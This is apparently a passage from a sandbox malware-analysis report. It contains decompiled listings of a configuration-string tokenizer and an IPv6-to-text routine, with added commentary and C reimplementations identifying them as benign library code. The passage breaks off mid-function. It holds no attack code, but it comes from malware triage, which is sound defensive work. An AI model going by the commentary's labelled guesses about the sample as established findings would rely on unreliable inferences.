                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                        • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                        • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                        • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                        • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                        • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                        • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                        • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                        • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                        • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

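The decompiled routine E00888788 that follows reads several configuration values (WindowsExcludedProcs and the Kernel-MUI-* entries) and, for three of them, copies the value into a freshly allocated buffer, splits it in place on ';', counts the pieces that pass a validator, and releases the buffer again when none pass. The same loop appears three times and is hard to follow through the decompiler's register names, so here is a readable C rendering of it. This is an added example, not code from the sample or from the report: the validator is a hypothetical stand-in for E00885553, and treating E0086E0C6 / E00862340 / E0086E025 as allocate / copy / free over the process heap (their first argument is PEB->ProcessHeap, reached through fs:[0x18] -> +0x30 -> +0x18 on 32-bit Windows) is an inference from their arguments, not something the report states.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>

/* Hypothetical stand-in for the validator the decompilation calls as
 * E00885553: accepts a token shaped like "ll-CC" (two lower-case letters,
 * a hyphen, two upper-case letters). An assumption, not the sample's logic. */
static bool looks_like_lang_tag(const wchar_t *tok)
{
    if (wcslen(tok) != 5 || tok[2] != L'-')
        return false;
    return tok[0] >= L'a' && tok[0] <= L'z' && tok[1] >= L'a' && tok[1] <= L'z' &&
           tok[3] >= L'A' && tok[3] <= L'Z' && tok[4] >= L'A' && tok[4] <= L'Z';
}

/* Readable rendering of the tokenizing loop: find the next ';', overwrite it
 * with 0 so the current piece is NUL-terminated, validate the piece, and step
 * past the separator (the decompiler's "+ 2" is one 16-bit wchar on Windows).
 * After the loop, the trailing piece that has no ';' behind it is validated
 * too, which is the "if (*_v16 != 0)" check after each while loop. The return
 * value is the decompilation's _a4 counter. */
size_t count_valid_entries(wchar_t *list, bool (*valid)(const wchar_t *))
{
    size_t accepted = 0;
    wchar_t *cur = list;
    wchar_t *sep;

    while ((sep = wcschr(cur, L';')) != NULL) {
        *sep = 0;                    /* terminate the current token in place */
        if (valid(cur))
            accepted++;
        cur = sep + 1;               /* advance one wide character */
    }
    if (*cur != 0 && valid(cur))     /* last token, or the whole string if no ';' */
        accepted++;
    return accepted;
}

/* Mirrors the surrounding allocate / copy / free pattern: take a private,
 * zero-filled copy (the decompilation passes flag 8 to the allocator, which
 * is HEAP_ZERO_MEMORY if it is RtlAllocateHeap), tokenize it, and discard the
 * copy when nothing was accepted, exactly as the "_a4 == 0" branches do.
 * The caller owns the returned buffer and must free() it; NULL means no
 * usable entries. The buffer is left tokenized (embedded NULs), as in the
 * sample, so the caller also needs the count written to *n_out. */
wchar_t *keep_if_any_valid(const wchar_t *src, bool (*valid)(const wchar_t *),
                           size_t *n_out)
{
    size_t len = wcslen(src);
    wchar_t *copy = calloc(len + 1, sizeof(wchar_t));
    if (copy == NULL) {
        *n_out = 0;
        return NULL;
    }
    memcpy(copy, src, len * sizeof(wchar_t));

    size_t n = count_valid_entries(copy, valid);
    if (n == 0) {
        free(copy);
        copy = NULL;
    }
    *n_out = n;
    return copy;
}

int main(void)
{
    /* Constructed input; not taken from the sample. */
    size_t n = 0;
    wchar_t *kept = keep_if_any_valid(L"en-US;bad;de-DE", looks_like_lang_tag, &n);
    free(kept);
    return n == 2 ? 0 : 1;
}
```

The two points worth taking from the rendering are the in-place tokenization (the buffer is never reallocated; separators simply become terminators) and the fact that a value consisting only of rejected tokens is freed and its pointer and length slots zeroed, so a consumer of the final structure sees "absent" rather than "present but empty".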
                                                        C-Code - Quality: 94%
                                                        			E00888788(signed int __ecx, void* __edx, signed int _a4) {
                                                        				signed int _v8;
                                                        				short* _v12;
                                                        				void* _v16;
                                                        				signed int _v20;
                                                        				char _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				char _v36;
                                                        				signed int _v40;
                                                        				char _v44;
                                                        				signed int _v48;
                                                        				signed int _v52;
                                                        				signed int _v56;
                                                        				signed int _v60;
                                                        				char _v68;
                                                        				void* _t216;
                                                        				intOrPtr _t231;
                                                        				short* _t235;
                                                        				intOrPtr _t257;
                                                        				short* _t261;
                                                        				intOrPtr _t284;
                                                        				intOrPtr _t288;
                                                        				void* _t314;
                                                        				signed int _t318;
                                                        				short* _t319;
                                                        				intOrPtr _t321;
                                                        				void* _t328;
                                                        				void* _t329;
                                                        				char* _t332;
                                                        				signed int _t333;
                                                        				signed int* _t334;
                                                        				void* _t335;
                                                        				void* _t338;
                                                        				void* _t339;
                                                        
                                                        				_t328 = __edx;
                                                        				_t322 = __ecx;
                                                        				_t318 = 0;
                                                        				_t334 = _a4;
                                                        				_v8 = 0;
                                                        				_v28 = 0;
                                                        				_v48 = 0;
                                                        				_v20 = 0;
                                                        				_v40 = 0;
                                                        				_v32 = 0;
                                                        				_v52 = 0;
                                                        				if(_t334 == 0) {
                                                        					_t329 = 0xc000000d;
                                                        					L49:
                                                        					_t334[0x11] = _v56;
                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                        					_t334[0x12] = _v60;
                                                        					_t334[0x13] = _v28;
                                                        					_t334[0x17] = _v20;
                                                        					_t334[0x16] = _v48;
                                                        					_t334[0x18] = _v40;
                                                        					_t334[0x14] = _v32;
                                                        					_t334[0x15] = _v52;
                                                        					return _t329;
                                                        				}
                                                        				_v56 = 0;
                                                        				if(E00888460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                        					_v56 = 1;
                                                        					if(_v8 != 0) {
                                                        						_t207 = E0086E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                        					}
                                                        					_push(1);
                                                        					_v8 = _t318;
                                                        					E0088718A(_t207);
                                                        					_t335 = _t335 + 4;
                                                        				}
                                                        				_v60 = _v60 | 0xffffffff;
                                                        				if(E00888460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                        					_t333 =  *_v8;
                                                        					_v60 = _t333;
                                                        					_t314 = E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        					_push(_t333);
                                                        					_v8 = _t318;
                                                        					E0088718A(_t314);
                                                        					_t335 = _t335 + 4;
                                                        				}
                                                        				_t216 = E00888460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                        				_t332 = ";";
                                                        				if(_t216 < 0) {
                                                        					L17:
                                                        					if(E00888460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                        						L30:
                                                        						if(E00888460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                        							L46:
                                                        							_t329 = 0;
                                                        							L47:
                                                        							if(_v8 != _t318) {
                                                        								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        							}
                                                        							if(_v28 != _t318) {
                                                        								if(_v20 != _t318) {
                                                        									E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                        									_v20 = _t318;
                                                        									_v40 = _t318;
                                                        								}
                                                        							}
                                                        							goto L49;
                                                        						}
                                                        						_t231 = _v24;
                                                        						_t322 = _t231 + 4;
                                                        						_push(_t231);
                                                        						_v52 = _t322;
                                                        						E0088718A(_t231);
                                                        						if(_t322 == _t318) {
                                                        							_v32 = _t318;
                                                        						} else {
                                                        							_v32 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        						}
                                                        						if(_v32 == _t318) {
                                                        							_v52 = _t318;
                                                        							L58:
                                                        							_t329 = 0xc0000017;
                                                        							goto L47;
                                                        						} else {
                                                        							E00862340(_v32, _v8, _v24);
                                                        							_v16 = _v32;
                                                        							_a4 = _t318;
                                                        							_t235 = E0087E679(_v32, _t332);
                                                        							while(1) {
                                                        								_t319 = _t235;
                                                        								if(_t319 == 0) {
                                                        									break;
                                                        								}
                                                        								 *_t319 = 0;
                                                        								_t321 = _t319 + 2;
                                                        								E0086E2A8(_t322,  &_v68, _v16);
                                                        								if(E00885553(_t328,  &_v68,  &_v36) != 0) {
                                                        									_a4 = _a4 + 1;
                                                        								}
                                                        								_v16 = _t321;
                                                        								_t235 = E0087E679(_t321, _t332);
                                                        								_pop(_t322);
                                                        							}
                                                        							_t236 = _v16;
                                                        							if( *_v16 != _t319) {
                                                        								E0086E2A8(_t322,  &_v68, _t236);
                                                        								if(E00885553(_t328,  &_v68,  &_v36) != 0) {
                                                        									_a4 = _a4 + 1;
                                                        								}
                                                        							}
                                                        							if(_a4 == 0) {
                                                        								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                        								_v52 = _v52 & 0x00000000;
                                                        								_v32 = _v32 & 0x00000000;
                                                        							}
                                                        							if(_v8 != 0) {
                                                        								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                        							}
                                                        							_v8 = _v8 & 0x00000000;
                                                        							_t318 = 0;
                                                        							goto L46;
                                                        						}
                                                        					}
                                                        					_t257 = _v24;
                                                        					_t322 = _t257 + 4;
                                                        					_push(_t257);
                                                        					_v40 = _t322;
                                                        					E0088718A(_t257);
                                                        					_t338 = _t335 + 4;
                                                        					if(_t322 == _t318) {
                                                        						_v20 = _t318;
                                                        					} else {
                                                        						_v20 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        					}
                                                        					if(_v20 == _t318) {
                                                        						_v40 = _t318;
                                                        						goto L58;
                                                        					} else {
                                                        						E00862340(_v20, _v8, _v24);
                                                        						_v16 = _v20;
                                                        						_a4 = _t318;
                                                        						_t261 = E0087E679(_v20, _t332);
                                                        						_t335 = _t338 + 0x14;
                                                        						while(1) {
                                                        							_v12 = _t261;
                                                        							if(_t261 == _t318) {
                                                        								break;
                                                        							}
                                                        							_v12 = _v12 + 2;
                                                        							 *_v12 = 0;
                                                        							E0086E2A8(_v12,  &_v68, _v16);
                                                        							if(E00885553(_t328,  &_v68,  &_v36) != 0) {
                                                        								_a4 = _a4 + 1;
                                                        							}
                                                        							_v16 = _v12;
                                                        							_t261 = E0087E679(_v12, _t332);
                                                        							_pop(_t322);
                                                        						}
                                                        						_t269 = _v16;
                                                        						if( *_v16 != _t318) {
                                                        							E0086E2A8(_t322,  &_v68, _t269);
                                                        							if(E00885553(_t328,  &_v68,  &_v36) != 0) {
                                                        								_a4 = _a4 + 1;
                                                        							}
                                                        						}
                                                        						if(_a4 == _t318) {
                                                        							E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                        							_v40 = _t318;
                                                        							_v20 = _t318;
                                                        						}
                                                        						if(_v8 != _t318) {
                                                        							E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        						}
                                                        						_v8 = _t318;
                                                        						goto L30;
                                                        					}
                                                        				}
                                                        				_t284 = _v24;
                                                        				_t322 = _t284 + 4;
                                                        				_push(_t284);
                                                        				_v48 = _t322;
                                                        				E0088718A(_t284);
                                                        				_t339 = _t335 + 4;
                                                        				if(_t322 == _t318) {
                                                        					_v28 = _t318;
                                                        				} else {
                                                        					_v28 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        				}
                                                        				if(_v28 == _t318) {
                                                        					_v48 = _t318;
                                                        					goto L58;
                                                        				} else {
                                                        					E00862340(_v28, _v8, _v24);
                                                        					_v16 = _v28;
                                                        					_a4 = _t318;
                                                        					_t288 = E0087E679(_v28, _t332);
                                                        					_t335 = _t339 + 0x14;
                                                        					while(1) {
                                                        						_v12 = _t288;
                                                        						if(_t288 == _t318) {
                                                        							break;
                                                        						}
                                                        						_v12 = _v12 + 2;
                                                        						 *_v12 = 0;
                                                        						E0086E2A8(_v12,  &_v68, _v16);
                                                        						if(E00885553(_t328,  &_v68,  &_v36) != 0) {
                                                        							_a4 = _a4 + 1;
                                                        						}
                                                        						_v16 = _v12;
                                                        						_t288 = E0087E679(_v12, _t332);
                                                        						_pop(_t322);
                                                        					}
                                                        					_t296 = _v16;
                                                        					if( *_v16 != _t318) {
                                                        						E0086E2A8(_t322,  &_v68, _t296);
                                                        						if(E00885553(_t328,  &_v68,  &_v36) != 0) {
                                                        							_a4 = _a4 + 1;
                                                        						}
                                                        					}
                                                        					if(_a4 == _t318) {
                                                        						E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                        						_v48 = _t318;
                                                        						_v28 = _t318;
                                                        					}
                                                        					if(_v8 != _t318) {
                                                        						E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        					}
                                                        					_v8 = _t318;
                                                        					goto L17;
                                                        				}
                                                        			}

                                                        APIs
                                                        Strings
                                                        • Kernel-MUI-Language-Allowed, xrefs: 00888827
                                                        • Kernel-MUI-Number-Allowed, xrefs: 008887E6
                                                        • Kernel-MUI-Language-SKU, xrefs: 008889FC
                                                        • WindowsExcludedProcs, xrefs: 008887C1
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00888914
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: _wcspbrk
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 402402107-258546922
                                                        • Opcode ID: 4edefa3331bccce3174db55b66fdb60262bb28b6008e48f1faa7591f49128b23
                                                        • Instruction ID: 70d85cbc0ef58c11514611eed98c6548fc392ea83c2fb1751cabb40f5db0d175
                                                        • Opcode Fuzzy Hash: 4edefa3331bccce3174db55b66fdb60262bb28b6008e48f1faa7591f49128b23
                                                        • Instruction Fuzzy Hash: C4F107B6D00209EFCF11EF98C9859EEBBB8FF08304F55446AE505E7211EB349A45DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 38%
                                                        			E008A13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr* _v16;
                                                        				intOrPtr _v20;
                                                        				char _v24;
                                                        				intOrPtr _t71;
                                                        				signed int _t78;
                                                        				signed int _t86;
                                                        				char _t90;
                                                        				signed int _t91;
                                                        				signed int _t96;
                                                        				intOrPtr _t108;
                                                        				signed int _t114;
                                                        				void* _t115;
                                                        				intOrPtr _t128;
                                                        				intOrPtr* _t129;
                                                        				void* _t130;
                                                        
                                                        				_t129 = _a4;
                                                        				_t128 = _a8;
                                                        				_t116 = 0;
                                                        				_t71 = _t128 + 0x5c;
                                                        				_v8 = 8;
                                                        				_v20 = _t71;
                                                        				if( *_t129 == 0) {
                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                        						goto L5;
                                                        					} else {
                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                        						if(_t96 != 0) {
                                                        							L38:
                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                        								goto L5;
                                                        							} else {
                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                        								_t86 = E00897707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                        								L36:
                                                        								return _t128 + _t86 * 2;
                                                        							}
                                                        						}
                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                        						if(_t114 == 0) {
                                                        							L33:
                                                        							_t115 = 0x862926;
                                                        							L35:
                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                        							_t86 = E00897707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                        							goto L36;
                                                        						}
                                                        						if(_t114 != 0xffff) {
                                                        							_t116 = 0;
                                                        							goto L38;
                                                        						}
                                                        						if(_t114 != 0) {
                                                        							_t115 = 0x869cac;
                                                        							goto L35;
                                                        						}
                                                        						goto L33;
                                                        					}
                                                        				} else {
                                                        					L5:
                                                        					_a8 = _t116;
                                                        					_a4 = _t116;
                                                        					_v12 = _t116;
                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                        							_v8 = 6;
                                                        						}
                                                        					}
                                                        					_t90 = _v8;
                                                        					if(_t90 <= _t116) {
                                                        						L11:
                                                        						if(_a8 - _a4 <= 1) {
                                                        							_a8 = _t116;
                                                        							_a4 = _t116;
                                                        						}
                                                        						_t91 = 0;
                                                        						if(_v8 <= _t116) {
                                                        							L22:
                                                        							if(_v8 < 8) {
                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                        								_t128 = _t128 + E00897707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                        							}
                                                        							return _t128;
                                                        						} else {
                                                        							L14:
                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                        									_push(":");
                                                        									_push(_t71 - _t128 >> 1);
                                                        									_push(_t128);
                                                        									_t128 = _t128 + E00897707() * 2;
                                                        									_t71 = _v20;
                                                        									_t130 = _t130 + 0xc;
                                                        								}
                                                        								_t78 = E00897707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                        								_t130 = _t130 + 0x10;
                                                        							} else {
                                                        								_push(L"::");
                                                        								_push(_t71 - _t128 >> 1);
                                                        								_push(_t128);
                                                        								_t78 = E00897707();
                                                        								_t130 = _t130 + 0xc;
                                                        								_t91 = _a8 - 1;
                                                        							}
                                                        							_t91 = _t91 + 1;
                                                        							_t128 = _t128 + _t78 * 2;
                                                        							_t71 = _v20;
                                                        							if(_t91 >= _v8) {
                                                        								goto L22;
                                                        							}
                                                        							_t116 = 0;
                                                        							goto L14;
                                                        						}
                                                        					} else {
                                                        						// Scan the eight 16-bit groups for the longest run of zeros: _v12 holds the
                                                        						// run start (index just past the last nonzero group), (_a4, _a8) the best run
                                                        						// seen so far; the loop at L14 then prints that run once as "::".
                                                        						_t108 = 1;
                                                        						_v16 = _t129;
                                                        						_v24 = _t90;
                                                        						do {
                                                        							if( *_v16 == _t116) {
                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                        									_a4 = _v12;
                                                        									_a8 = _t108;
                                                        								}
                                                        								_t116 = 0;
                                                        							} else {
                                                        								_v12 = _t108;
                                                        							}
                                                        							_v16 = _v16 + 2;
                                                        							_t108 = _t108 + 1;
                                                        							_t26 =  &_v24;
                                                        							 *_t26 = _v24 - 1;
                                                        						} while ( *_t26 != 0);
                                                        						goto L11;
                                                        					}
                                                        				}
                                                        			}

                                                        Instruction addresses for the listing above (per-statement side column):
                                                        0x008a13d5 0x008a13d9 0x008a13dc 0x008a13de 0x008a13e1 0x008a13e8 0x008a13ee 0x008ce8fd
                                                        0x00000000 0x008ce921 0x008ce921 0x008ce928 0x008ce982 0x008ce98a 0x00000000 0x008ce99a
                                                        0x008ce99e 0x008ce9a3 0x008ce9a8 0x008ce9b9 0x008ce978 0x00000000 0x008ce978 0x008ce98a
                                                        0x008ce92a 0x008ce931 0x008ce944 0x008ce944 0x008ce950 0x008ce954 0x008ce959 0x008ce95e
                                                        0x008ce963 0x008ce970 0x00000000 0x008ce975 0x008ce93b 0x008ce980 0x00000000 0x008ce980
                                                        0x008ce942 0x008ce94b 0x00000000 0x008ce94b 0x00000000 0x008ce942 0x008a13f4 0x008a13f4
                                                        0x008a13f9 0x008a13fc 0x008a13ff 0x008a1406 0x008ce9cc 0x008ce9d2 0x008ce9d2 0x008ce9cc
                                                        0x008a140c 0x008a1411 0x008a1431 0x008a143a 0x008a143c 0x008a143f 0x008a143f 0x008a1442
                                                        0x008a1447 0x008a14a8 0x008a14ac 0x008ce9e2 0x008ce9e7 0x008ce9ec 0x008cea05 0x008cea05
                                                        0x00000000 0x008a1449 0x00000000 0x008a1449 0x008a144c 0x008a1459 0x008a1462 0x008a1469
                                                        0x008a146a 0x008a1470 0x008a1473 0x008a1476 0x008a1476 0x008a1490 0x008a1495 0x008a138e
                                                        0x008a1390 0x008a1397 0x008a1398 0x008a1399 0x008a13a1 0x008a13a4 0x008a13a4 0x008a1498
                                                        0x008a149c 0x008a149f 0x008a14a2 0x00000000 0x00000000 0x008a14a4 0x00000000 0x008a14a4
                                                        0x008a1413 0x008a1415 0x008a1416 0x008a1419 0x008a141c 0x008a1422 0x008a13b7 0x008a13bc
                                                        0x008a13bf 0x008a13bf 0x008a13c2 0x008a1424 0x008a1424 0x008a1424 0x008a1427 0x008a142b
                                                        0x008a142c 0x008a142c 0x008a142c 0x00000000 0x008a141c 0x008a1411
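The listing above is an IPv6 address-to-text routine: it finds the longest run of zero groups, prints that run once as "::", prints every other group with "%x", and prints an embedded IPv4 address with ":%u.%u.%u.%u" (the "::%hs%u.%u.%u.%u" / "ffff:" strings in the report cover the ::ffff: mapped and :: compatible forms). Recognising it matters for triage: this is runtime/library formatting code, not FormBook logic. The C below is an added stand-alone reimplementation of that algorithm for reference; it is not code from the sample or the report. Assumptions not visible in the listing: the run bounds arrive as arguments whose initial values are cut off here, so the rule that only runs of two or more groups are compressed, and the IPv4-compatible rule (first 96 bits zero, g[6] != 0), follow RFC 5952 and inet_ntop convention; the listing works in wide characters (its lengths are `>> 1`), this version uses narrow strings and adds explicit truncation handling.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPV6_GROUPS 8

/* Longest run of zero 16-bit groups, mirroring the listing's scan: a run starts just past the
 * last nonzero group and replaces the best one only when strictly longer, so the first of two
 * equal runs wins. Returns 1 and sets [*start, *end) for a run of >= 2 groups, else 0. */
static int longest_zero_run(const uint16_t g[IPV6_GROUPS], int *start, int *end)
{
    int best_start = 0, best_len = 0, run_start = 0;
    for (int i = 0; i < IPV6_GROUPS; i++) {
        if (g[i] != 0) {
            run_start = i + 1;
        } else if (i + 1 - run_start > best_len) {
            best_len = i + 1 - run_start;
            best_start = run_start;
        }
    }
    if (best_len < 2)              /* RFC 5952 4.2.2: a single zero group is not compressed */
        return 0;
    *start = best_start;
    *end = best_start + best_len;
    return 1;
}

/* Formats 16 network-order bytes. Returns the length written, or -1 if buf is too small. */
int ipv6_to_string(const uint8_t addr[16], char *buf, size_t buflen)
{
    uint16_t g[IPV6_GROUPS];
    for (int i = 0; i < IPV6_GROUPS; i++)
        g[i] = (uint16_t)((addr[2 * i] << 8) | addr[2 * i + 1]);

    /* ::ffff:a.b.c.d (IPv4-mapped) and ::a.b.c.d (IPv4-compatible) keep the last four bytes in
     * dotted form: the listing's "::%hs%u.%u.%u.%u" with %hs = "ffff:" or "". */
    int high_zero = (g[0] | g[1] | g[2] | g[3] | g[4]) == 0;
    if (high_zero && (g[5] == 0xffff || (g[5] == 0 && g[6] != 0))) {
        int n = snprintf(buf, buflen, "::%s%u.%u.%u.%u", g[5] == 0xffff ? "ffff:" : "",
                         (unsigned)addr[12], (unsigned)addr[13], (unsigned)addr[14], (unsigned)addr[15]);
        return (n < 0 || (size_t)n >= buflen) ? -1 : n;
    }

    int zs = 0, ze = 0;
    int compress = longest_zero_run(g, &zs, &ze);
    size_t pos = 0;
    for (int i = 0; i < IPV6_GROUPS; i++) {
        int n;
        if (compress && i > zs && i < ze)
            continue;                               /* swallowed by the "::" */
        if (compress && i == zs) {
            n = snprintf(buf + pos, buflen - pos, "::");
        } else {
            /* ':' precedes every group except the first and the one right after "::" */
            const char *sep = (i == 0 || (compress && i == ze)) ? "" : ":";
            n = snprintf(buf + pos, buflen - pos, "%s%x", sep, (unsigned)g[i]);
        }
        if (n < 0 || (size_t)n >= buflen - pos)
            return -1;
        pos += (size_t)n;
    }
    return (int)pos;
}

/* 1 if addr formats exactly as expected. */
int formats_as(const uint8_t addr[16], const char *expected)
{
    char out[64];
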